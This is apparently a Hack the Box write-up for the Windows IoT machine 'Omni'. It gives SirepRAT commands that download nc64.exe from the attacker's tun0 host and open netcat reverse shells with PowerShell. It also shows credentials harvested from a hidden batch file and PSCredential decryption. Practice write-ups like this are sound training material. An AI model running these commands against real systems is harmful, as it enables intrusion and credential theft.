Hack the Box —Omni
Let’s start with scanning the Host
nmap -sV -sC -Pn 10.10.10.204
Microsoft Windows RPC is a protocol to provide a transparent communication so that the client could directly communicate with the servers.
Microsoft IIS httpd
IIS is a flexible, general-purpose web server from Microsoft that runs on windows system to serve requested HTML pages or files.
Let’s look at the Webpage
I make a google search on ‘Windows Device Portal’,
https://docs.microsoft.com/en-us/windows/iot-core/manage-your-device/deviceportal
The default credentials are not working.
Since, this Box is an IOT box, so i google about WindowsIot vulnerabilities. I got a link about a vulnerability(below).
First off clone SirepRAT repository from github.
Second, Download Windows Netcat Binary (64 bit)
Extract it and transfer nc64.exe to the root directory.
Start SimpleHTTPServer on the same directory.
Get inside SirepRAT directory and run.
$ python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput — return_output — cmd “C:\Windows\System32\cmd.exe” — args “/c powershell Invoke-Webrequest -OutFile C:\\Windows\\System32\\spool\\drivers\\color\\nc64.exe -Uri http://tun0/nc64.exe" –v
The Command was successful.
Now get your Netcat listener ready.
$ nc -nlvp 4545
Now let’s execute Netcat on the box.
python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput — return_output — cmd “C:\Windows\System32\cmd.exe” — args “/c C:\\Windows\\System32\\spool\\drivers\\color\\nc64.exe tun0 4545 -e powershell.exe” — v
AND WE GOT OUR SHELL !!!
We can’t use whoami, so my friend suggested me that we could use $env:UserName to know the Username.
Now let’s enumerate it more…
Here I got to know about dir –force which helps in finding hidden files in a directory.
I checked out r.bat which I found using dir –force and I got 2 usernames and passwords.
Remember the webpage we found on port 8080.We could use our credentials there
Firstly I am using “app” and I got a new webpage
While checking webpage under processes tab I found a run command where I can run any command so I tried getting a reverse shell.
Again I started my netcat listener with a different port and then I used below command
C:\Windows\System32\spool\drivers\color\nc64.exe tun0 5555 -e powershell.exe
GOT A SHELL!!!!
Let’s look at the username following earlier command .
After enumerating further I got the user.txt but Content inside the user.txt are encrypted..
Notice PSCredentials !!!
BEFORE GOING FURTHER GOOGLE PSCredentials
https://mcpmag.com/articles/2017/07/20/save-and-read-sensitive-data-with-powershell.aspx
I got to know about PSCredentials and how to get decrypted password from that
I used two commands:
1.) $credential = Import-CliXml -Path U:\Users\app\user.txt
2.) $credential.GetNetworkCredential().Password
I GOT THE USER FLAG!!!
ROOT
Remember we got two usernames from r.bat file?? Now use second username for “administrator” to get the root flag.
TIP
For root follow the same steps that I used to get the user flag.